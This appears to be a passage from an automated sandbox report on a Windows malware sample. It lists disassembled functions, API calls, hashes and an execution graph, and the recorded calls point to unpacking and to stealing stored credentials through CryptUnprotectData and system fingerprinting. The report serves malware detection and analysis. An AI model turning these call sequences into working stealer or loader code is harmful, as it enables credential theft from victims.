                                                              • Instruction Fuzzy Hash: AE21383234E201EBDB009B90AD419BA3315AB85714F34467BF5137A1F2C63E99436F6B
                                                              Function 004019E3 Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 478 4019e3-401a48 call 4012a9 Sleep call 401524 493 401a57-401aa7 call 4012a9 478->493 494 401a4a-401a52 call 401615 478->494 494->493
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1649944947.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: a19bf6b6478727a7cf19fe344aa6eb98edbd1b9355ee0bc977b84921ba6b77a5
                                                              • Instruction ID: 3d34462ae554e6b9c52ec10bfc335e1d4eef14cf0cc07287d36856a9453ce069
                                                              • Opcode Fuzzy Hash: a19bf6b6478727a7cf19fe344aa6eb98edbd1b9355ee0bc977b84921ba6b77a5
                                                              • Instruction Fuzzy Hash: AA11E17274A205FBDB00AA949C41EBA3228AB45714F308577BA43780F1D57D8953BF6F
                                                              Function 004019EE Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 508 4019ee-401a48 call 4012a9 Sleep call 401524 521 401a57-401aa7 call 4012a9 508->521 522 401a4a-401a52 call 401615 508->522 522->521
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1649944947.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: c9c058988959fe6f1bebb02f4b63465d1859dbae07441d9c99848e32b1ac1650
                                                              • Instruction ID: fd11faa5c1113836d14621795cf3d83bd65fd701f71c993b701afff5049cc75c
                                                              • Opcode Fuzzy Hash: c9c058988959fe6f1bebb02f4b63465d1859dbae07441d9c99848e32b1ac1650
                                                              • Instruction Fuzzy Hash: 27018B3274A201EBDB009A949C42ABA3728AF45714F2045B7BA43B90F1C67D99536F2B
                                                              Function 004019FA Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1649944947.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: e11e32dbe801df22405823e13fb522a3676c7564745947c388d06d8c8a7d4e2f
                                                              • Instruction ID: 6cc9081dd0b90bd572a9145dab600ca03ca16d67528742debddf3dc55f5ee8c1
                                                              • Opcode Fuzzy Hash: e11e32dbe801df22405823e13fb522a3676c7564745947c388d06d8c8a7d4e2f
                                                              • Instruction Fuzzy Hash: 1A01C03274A105EBDB009A949C41EBA3328AB44710F308577BA43790F1C57D8A537F6F
                                                              Function 00401A09 Relevance: 1.3, APIs: 1, Instructions: 49sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1649944947.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: cf05c8cd51f06970e1e68389e54baa8339b7ac568fc1d90295f4adfe3ec01b5a
                                                              • Instruction ID: 82411e1791d3a8170d7b0096784b0d07359e834b960e05cc8d1eb1f577d4cd17
                                                              • Opcode Fuzzy Hash: cf05c8cd51f06970e1e68389e54baa8339b7ac568fc1d90295f4adfe3ec01b5a
                                                              • Instruction Fuzzy Hash: 90018F3274A205EBDB00AAD4AC42EAA33289F45714F244577FA43B90F1C57D8A536F6B
                                                              Function 00401A10 Relevance: 1.3, APIs: 1, Instructions: 48sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1649944947.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: 1ce4031546dc902cc4609c7e7de6d107d1fd440efca43239d715d6f2af8bec59
                                                              • Instruction ID: 961536146c74ce18795349366bfe527767909b26be76020be6548142ac7a4a5b
                                                              • Opcode Fuzzy Hash: 1ce4031546dc902cc4609c7e7de6d107d1fd440efca43239d715d6f2af8bec59
                                                              • Instruction Fuzzy Hash: 47018472705209EBCB00ABD09C42EA933249B45314F644577FA12B90F2D67D89536B2B
                                                              Function 022063A9 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 022063FA
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1651023063.0000000002203000.00000040.00000020.00020000.00000000.sdmp, Offset: 02203000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2203000_etrtabd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction ID: 75c4353ebcd5f781d925fc842a44eb4d0d7595bd27661a22a0b3a73f15f8e29f
                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction Fuzzy Hash: 99113C79A00208EFDB01DF98C985E98BBF5AF08350F098094F9489B366D771EA90DF80

                                                              Non-executed Functions

                                                              Function 0040BC36 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • UnhandledExceptionFilter.KERNEL32(00000000), ref: 0040BC59
                                                              • SetDefaultCommConfigA.KERNEL32(004230F0,?,00000000), ref: 0040BCAB
                                                              • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040BCB5
                                                              • SleepEx.KERNEL32(00000000,00000000), ref: 0040BCBD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1650003513.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_40b000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: CalendarCommConfigDefaultExceptionFilterInfoSleepUnhandled
                                                              • String ID: -$d
                                                              • API String ID: 1714755991-1961052230
                                                              • Opcode ID: 767ce9f6e4b45859f0c898ce4a81191f8eb161bd46e591fa79638400a5444451
                                                              • Instruction ID: 611937db618160795b45420ca4b56ae8592046bfbc2aad96a730228e8614ca7d
                                                              • Opcode Fuzzy Hash: 767ce9f6e4b45859f0c898ce4a81191f8eb161bd46e591fa79638400a5444451
                                                              • Instruction Fuzzy Hash: 75119071D01228ABCB21DFA9ED859DFBFB8EF55714F10003AF105B6291CB344546CB99
                                                              Function 0040BAA9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(01F6EC08), ref: 0040BB75
                                                              • GetProcAddress.KERNEL32(00000000,00427ED0), ref: 0040BBB2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1650003513.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_40b000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID:
                                                              • API String ID: 1646373207-3916222277
                                                              • Opcode ID: f2f97dbd91ceef343cfa434ec76e2481c584c5966074daf8de3eed7171195444
                                                              • Instruction ID: 18c5cc9d400b96faee746cab7009418996affa1f81997e9bff723ab5a3e11860
                                                              • Opcode Fuzzy Hash: f2f97dbd91ceef343cfa434ec76e2481c584c5966074daf8de3eed7171195444
                                                              • Instruction Fuzzy Hash: CD31A03A66C7C4D8F321C7A4BD09B213B599B11B04F4184AAD550CB2BAD7FB0985C37E

                                                              Execution Graph

                                                              Execution Coverage:8%
                                                              Dynamic/Decrypted Code Coverage:32.9%
                                                              Signature Coverage:6.8%
                                                              Total number of Nodes:310
                                                              Total number of Limit Nodes:12
                                                              execution_graph 21815 412e44 21816 412e4d 21815->21816 21817 412e57 21816->21817 21819 409960 21816->21819 21820 409975 21819->21820 21824 4099c7 21819->21824 21825 4336f0 21820->21825 21822 409a3b 21823 435440 RtlAllocateHeap 21822->21823 21823->21824 21824->21817 21826 43376b 21825->21826 21827 4337a8 RtlExpandEnvironmentStrings 21825->21827 21826->21827 21828 41b544 21829 41b552 21828->21829 21835 435440 21829->21835 21831 41b55c 21838 41bd00 21831->21838 21856 41f960 21831->21856 21832 41b5c6 21836 4354d0 RtlAllocateHeap 21835->21836 21837 43549d 21835->21837 21836->21831 21837->21836 21839 41bdc0 21838->21839 21840 41bd16 21838->21840 21839->21832 21840->21839 21841 435440 RtlAllocateHeap 21840->21841 21842 41be27 21841->21842 21842->21842 21860 43a060 21842->21860 21844 41beda 21844->21839 21846 435440 RtlAllocateHeap 21844->21846 21845 41be9d 21845->21839 21845->21844 21847 43a060 2 API calls 21845->21847 21848 41beea 21846->21848 21847->21844 21866 43a530 21848->21866 21850 41befc 21851 41bf66 21850->21851 21852 435440 RtlAllocateHeap 21850->21852 21851->21839 21873 4373e0 LdrInitializeThunk 21851->21873 21854 41bf78 21852->21854 21854->21854 21872 408f90 RtlAllocateHeap 21854->21872 21857 41f979 21856->21857 21859 41fae0 21856->21859 21858 435440 RtlAllocateHeap 21857->21858 21858->21859 21859->21832 21861 43a080 21860->21861 21862 435440 RtlAllocateHeap 21861->21862 21864 43a0b5 21862->21864 21863 43a1fe 21863->21845 21864->21863 21874 4373e0 LdrInitializeThunk 21864->21874 21868 43a575 21866->21868 21867 43a6ce 21867->21850 21869 43a5ee 21868->21869 21875 4373e0 LdrInitializeThunk 21868->21875 21869->21867 21869->21869 21876 4373e0 LdrInitializeThunk 21869->21876 21872->21851 21873->21839 21874->21863 21875->21869 21876->21867 22084 436d86 22085 436da7 22084->22085 22086 436e6f LoadLibraryW 22085->22086 22087 436e76 22086->22087 22088 414c84 22089 414cd0 22088->22089 22090 435440 RtlAllocateHeap 22089->22090 22091 414d2a 22090->22091 22091->22091 22092 43a060 2 API calls 22091->22092 22093 414d9e 22092->22093 22094 40d20b 22095 40d210 22094->22095 22096 435440 RtlAllocateHeap 22095->22096 22097 40d233 22096->22097 21877 41184c 21878 411855 21877->21878 21883 414ec0 21878->21883 21880 41186c 21881 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 21880->21881 21882 411876 21881->21882 21884 414ee0 21883->21884 21884->21884 21885 414eeb RtlExpandEnvironmentStrings 21884->21885 21886 414f08 21885->21886 21887 435440 RtlAllocateHeap 21886->21887 21888 414f18 RtlExpandEnvironmentStrings 21887->21888 21889 414fa1 21888->21889 21890 435440 RtlAllocateHeap 21889->21890 21891 415056 21890->21891 21891->21891 21892 43a060 2 API calls 21891->21892 21893 4150ca 21892->21893 22098 42880f 22099 428816 22098->22099 22100 4336f0 RtlExpandEnvironmentStrings 22099->22100 22101 4288ea 22100->22101 22102 428934 GetPhysicallyInstalledSystemMemory 22101->22102 22103 428959 22102->22103 22103->22103 21894 43724d 21895 437295 21894->21895 21896 4372df RtlReAllocateHeap 21894->21896 21895->21896 21897 4373a0 21896->21897 22108 79da36 22109 79da45 22108->22109 22112 79e1d6 22109->22112 22114 79e1f1 22112->22114 22113 79e1fa CreateToolhelp32Snapshot 22113->22114 22115 79e216 Module32First 22113->22115 22114->22113 22114->22115 22116 79e225 22115->22116 22118 79da4e 22115->22118 22119 79de95 22116->22119 22120 79dec0 22119->22120 22121 79df09 22120->22121 22122 79ded1 VirtualAlloc 22120->22122 22121->22121 22122->22121 21898 427353 21899 42735d 21898->21899 21900 427de0 GetComputerNameExA 21899->21900 21901 427efb GetComputerNameExA 21899->21901 21900->21899 21901->21899 21902 413ed3 21907 42ec90 21902->21907 21904 413ee0 21905 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 21904->21905 21906 413efc 21905->21906 21908 42ecc7 KiUserCallbackDispatcher GetSystemMetrics 21907->21908 21909 42ed10 DeleteObject 21908->21909 21911 42ed7e SelectObject 21909->21911 21913 42ee29 SelectObject 21911->21913 21914 42ee55 DeleteObject 21913->21914 22123 425e97 22125 425e63 22123->22125 22124 42605e 22125->22123 22125->22124 22127 4373e0 LdrInitializeThunk 22125->22127 22127->22124 21916 422ddb 21917 422df0 21916->21917 21917->21917 21918 435440 RtlAllocateHeap 21917->21918 21919 422ee2 21918->21919 21920 43a060 2 API calls 21919->21920 21921 422f8a 21920->21921 22133 412198 22134 4121a1 22133->22134 22139 417a30 22134->22139 22136 4121b9 22137 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 22136->22137 22138 4121c3 22137->22138 22140 417a50 22139->22140 22140->22140 22141 417a5b RtlExpandEnvironmentStrings 22140->22141 22142 417a78 22141->22142 22143 435440 RtlAllocateHeap 22142->22143 22144 417a88 RtlExpandEnvironmentStrings 22143->22144 22145 43a250 2 API calls 22144->22145 22146 417aa9 22145->22146 21922 4331d8 21924 433238 21922->21924 21923 4332c0 21924->21923 21926 4373e0 LdrInitializeThunk 21924->21926 21926->21923 21927 415cdd 21928 415cf1 21927->21928 21929 435440 RtlAllocateHeap 21928->21929 21930 415d30 21929->21930 21931 435440 RtlAllocateHeap 21930->21931 21932 415de3 21931->21932 21935 43a250 21932->21935 21934 415e51 21936 43a270 21935->21936 21936->21936 21937 435440 RtlAllocateHeap 21936->21937 21938 43a2a0 21937->21938 21939 43a3ce 21938->21939 21941 4373e0 LdrInitializeThunk 21938->21941 21939->21934 21941->21939 22157 414a9f 22158 435440 RtlAllocateHeap 22157->22158 22159 414aa7 22158->22159 22160 43a530 LdrInitializeThunk 22159->22160 22161 414abe 22160->22161 22162 408ea0 22164 408eab 22162->22164 22163 408f0b ExitProcess 22165 408ebc GetStdHandle GetConsoleWindow 22164->22165 22166 408eaf 22164->22166 22165->22166 22166->22163 21948 416460 21951 4174d0 21948->21951 21952 417599 21951->21952 21953 435440 RtlAllocateHeap 21952->21953 21954 417665 21953->21954 21955 435440 RtlAllocateHeap 21954->21955 21956 417862 21955->21956 21957 41ede3 21958 41edf3 21957->21958 21959 41ee02 21957->21959 21958->21959 21963 43a900 21958->21963 21967 43b050 RtlAllocateHeap LdrInitializeThunk 21959->21967 21962 41eeb7 21964 43a920 21963->21964 21966 43aa1e 21964->21966 21968 4373e0 LdrInitializeThunk 21964->21968 21966->21959 21967->21962 21968->21966 22167 433ca4 22168 43a060 2 API calls 22167->22168 22169 433cb9 22168->22169 22170 43a060 2 API calls 22169->22170 22171 433cfe 22170->22171 21969 42b5e8 21970 42b6f6 21969->21970 21971 42b72c SysAllocString 21969->21971 21970->21971 21972 42b79e 21971->21972 22172 417b2d 22173 417b8b 22172->22173 22174 41a800 2 API calls 22173->22174 22175 417bcc 22174->22175 21973 212003c 21974 2120049 21973->21974 21975 212004c 21973->21975 21989 2120e0f SetErrorMode SetErrorMode 21975->21989 21980 2120265 21981 21202ce VirtualProtect 21980->21981 21983 212030b 21981->21983 21982 2120439 VirtualFree 21987 21205f4 LoadLibraryA 21982->21987 21988 21204be 21982->21988 21983->21982 21984 21204e3 LoadLibraryA 21984->21988 21986 21208c7 21987->21986 21988->21984 21988->21987 21990 2120223 21989->21990 21991 2120d90 21990->21991 21992 2120dad 21991->21992 21993 2120dbb GetPEB 21992->21993 21994 2120238 VirtualAlloc 21992->21994 21993->21994 21994->21980 21999 41c0f0 22000 41c0fc 21999->22000 22004 41c150 21999->22004 22001 435440 RtlAllocateHeap 22000->22001 22002 41c164 22001->22002 22003 435440 RtlAllocateHeap 22002->22003 22003->22004 22176 419db0 22177 419e00 22176->22177 22178 419dbe 22176->22178 22179 435440 RtlAllocateHeap 22178->22179 22180 419e14 22179->22180 22180->22180 22182 419ec0 22180->22182 22183 419f2d 22182->22183 22184 435440 RtlAllocateHeap 22183->22184 22185 419fb2 22184->22185 22185->22185 22186 43a250 2 API calls 22185->22186 22187 41a01d 22186->22187 22005 41baf3 22006 435440 RtlAllocateHeap 22005->22006 22007 41bb0a 22006->22007 22012 413cf5 22013 413d05 22012->22013 22040 41cfa0 22013->22040 22015 413d0b 22016 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 22015->22016 22017 413d15 22016->22017 22018 41d8e0 6 API calls 22017->22018 22019 413d28 22018->22019 22020 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 22019->22020 22021 413d32 22020->22021 22022 41db10 LdrInitializeThunk 22021->22022 22023 413d48 22022->22023 22024 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 22023->22024 22025 413d52 22024->22025 22026 41fd10 RtlAllocateHeap LdrInitializeThunk 22025->22026 22027 413d68 22026->22027 22028 420880 RtlAllocateHeap LdrInitializeThunk 22027->22028 22029 413d71 22028->22029 22030 420d60 LdrInitializeThunk 22029->22030 22031 413d7a 22030->22031 22032 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 22031->22032 22033 413d84 22032->22033 22034 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 22033->22034 22035 413da4 22034->22035 22036 425260 RtlAllocateHeap 22035->22036 22037 413dba 22036->22037 22038 42eab0 6 API calls 22037->22038 22039 413dc3 22038->22039 22041 41d016 22040->22041 22042 41d069 RtlExpandEnvironmentStrings 22040->22042 22041->22042 22043 41d0ae 22042->22043 22044 435440 RtlAllocateHeap 22043->22044 22045 41d0be RtlExpandEnvironmentStrings 22044->22045 22046 41d13b 22045->22046 22047 435440 RtlAllocateHeap 22046->22047 22048 41d1ca 22047->22048 22048->22048 22049 43a250 2 API calls 22048->22049 22050 41d247 22049->22050 22051 42f3f6 22054 42fae0 22051->22054 22055 42fb34 22054->22055 22056 435440 RtlAllocateHeap 22055->22056 22057 42fc14 22056->22057 22058 431df6 22059 431dfb 22058->22059 22060 435440 RtlAllocateHeap 22059->22060 22061 431e09 22060->22061 22062 43a530 LdrInitializeThunk 22061->22062 22063 431e33 22062->22063 22188 43803b 22190 437f65 22188->22190 22189 4380c5 22190->22188 22190->22189 22192 4373e0 LdrInitializeThunk 22190->22192 22192->22190 22193 41a63b 22194 41a640 22193->22194 22194->22194 22195 41a800 2 API calls 22194->22195 22196 41a6f9 22195->22196 22064 41a77a 22065 41a793 22064->22065 22068 41a800 22065->22068 22069 43a060 2 API calls 22068->22069 22070 41a859 22069->22070 22071 4372f8 22072 437380 RtlAllocateHeap 22071->22072 22074 437348 22071->22074 22073 4373a0 22072->22073 22074->22072 22074->22074 22075 4337fd 22078 439500 22075->22078 22077 43382b GetVolumeInformationW 22197 43793d 22199 437982 22197->22199 22198 4379ee 22199->22198 22201 4373e0 LdrInitializeThunk 22199->22201 22201->22198 22079 41537e 22080 415388 22079->22080 22081 435440 RtlAllocateHeap 22080->22081 22083 4154e8 22081->22083 22082 415635 CryptUnprotectData 22083->22082

                                                              Executed Functions

                                                              Function 0042EC90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 184COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
                                                              • String ID:
                                                              • API String ID: 1449868515-3916222277
                                                              • Opcode ID: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
                                                              • Instruction ID: 60327d0f96a7b3deecf0ce21178eeb5ed9b1cd1e9f4d058b5d703ebe2579cb86
                                                              • Opcode Fuzzy Hash: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
                                                              • Instruction Fuzzy Hash: C8B18CB85093808FE364DF29D58579BBBE0ABC9304F00892EE9D987350D7749548DF8A
                                                              Function 00427353 Relevance: 9.9, APIs: 2, Strings: 3, Instructions: 1198COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 2PBb$Yceh$]hW9
                                                              • API String ID: 0-1551782443
                                                              • Opcode ID: f6dc15c76937f0d7342aa57ecbcc9b9ec27201aace4dd33c85c24a32b54af3b4
                                                              • Instruction ID: 0399154fc7d8c55f12102b5960697b3d06da357f666e701177502f53bd351286
                                                              • Opcode Fuzzy Hash: f6dc15c76937f0d7342aa57ecbcc9b9ec27201aace4dd33c85c24a32b54af3b4
                                                              • Instruction Fuzzy Hash: B7926C70208B908EE726CF35C4A07E7BBE1BF16305F44499DD1EB8B282DB796509CB55
                                                              Function 0041FD10 Relevance: 6.8, Strings: 5, Instructions: 531COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 419 41fd10-41fd3b 420 41fdc0-41ff6c 419->420 421 420000-4201ac 419->421 422 41fd42-41fd4f 419->422 423 41ffb4-41ffb7 419->423 424 41fd8c 419->424 425 41ffbe-41ffe5 call 43ad30 419->425 432 41ff97-41ffa6 call 43a900 420->432 433 41ff6e-41ff6f 420->433 430 4201d7-4201eb call 43a900 421->430 431 4201ae-4201af 421->431 422->422 427 41fd70-41fd7e 422->427 428 41fda0-41fdaf 422->428 429 41fd85 422->429 423->425 434 420200-42020a 423->434 435 420220-42026d call 437200 423->435 436 41ffec 423->436 424->428 425->435 425->436 427->422 427->429 428->420 428->422 428->429 429->424 430->434 438 4201b0-4201d5 431->438 444 41ffab 432->444 440 41ff70-41ff95 433->440 434->435 446 420502-420507 435->446 447 420523-42056f 435->447 448 4204a0-4204ab 435->448 449 420280-420291 call 43a900 435->449 450 4202a5 435->450 451 420645-42064c 435->451 452 42062f 435->452 453 4204ec 435->453 454 420512-42051c 435->454 455 420653-42065d 435->455 456 4202b0-420325 435->456 457 420510 435->457 458 4204f6-4204ff call 4087a0 435->458 459 420636-42063e 435->459 460 420397 435->460 461 420399-4203a1 435->461 462 42061e-420628 435->462 436->421 438->430 438->438 440->432 440->440 444->423 446->457 469 4205b0-4205b8 447->469 470 420571 447->470 463 4204b2-4204d0 call 435440 call 43aa50 448->463 464 4204ad 448->464 473 420296-42029e 449->473 450->456 451->455 451->459 452->459 453->458 454->446 454->447 454->448 454->449 454->450 454->451 454->452 454->453 454->454 454->455 454->456 454->457 454->458 454->459 454->460 454->461 454->462 455->446 455->447 455->448 455->449 455->450 455->451 455->452 455->453 455->454 455->455 455->456 455->457 455->458 455->459 455->460 455->461 455->462 466 420372-420383 call 43b430 456->466 467 420327 456->467 458->446 459->446 459->447 459->448 459->449 459->450 459->451 459->452 459->453 459->454 459->455 459->456 459->457 459->458 459->459 459->460 459->461 459->462 460->461 471 4203a3-4203a7 461->471 472 4203c1-420408 461->472 462->451 462->452 462->455 462->459 500 4204d5-4204e5 463->500 464->463 490 420388-420390 466->490 474 420330-420370 467->474 480 420600-420617 call 439e00 469->480 481 4205ba-4205c6 469->481 477 420580-4205ae 470->477 478 4203b0-4203bf 471->478 482 420440-420448 472->482 483 42040a 472->483 473->446 473->450 473->451 473->452 473->454 473->455 473->456 473->457 473->458 473->459 473->460 473->461 473->462 474->466 474->474 477->469 477->477 478->472 478->478 480->451 480->452 480->455 480->459 480->462 484 4205d0-4205d7 481->484 486 420490 482->486 487 42044a-420455 482->487 485 420410-42043e 483->485 491 4205e0-4205e6 484->491 492 4205d9-4205dc 484->492 485->482 485->485 486->448 494 420460-420467 487->494 490->446 490->451 490->452 490->454 490->455 490->457 490->458 490->459 490->460 490->461 490->462 491->480 497 4205e8-4205fa call 4373e0 491->497 492->484 496 4205de 492->496 498 420470-420476 494->498 499 420469-42046c 494->499 496->480 497->480 498->486 503 420478-42048f call 4373e0 498->503 499->494 502 42046e 499->502 500->446 500->449 500->450 500->451 500->452 500->453 500->454 500->455 500->456 500->457 500->458 500->459 500->460 500->461 500->462 502->486 503->486
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gdeb$gdeb$rr$}x$a_
                                                              • API String ID: 0-3617765606
                                                              • Opcode ID: ece44b61750e77531050f751d2c714b5c3d0fc1077405b2ce026a3a9abb68388
                                                              • Instruction ID: 6e898c47a17abb5f03504fba61c95c3f7ffb61a8dca5b2db11db91053f235b82
                                                              • Opcode Fuzzy Hash: ece44b61750e77531050f751d2c714b5c3d0fc1077405b2ce026a3a9abb68388
                                                              • Instruction Fuzzy Hash: 4E2278B4108381DFE320CF24D895B6BBBE0FB86308F54892DE5D99B262D7399505CF96
                                                              Function 00409960 Relevance: 6.7, Strings: 5, Instructions: 472COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
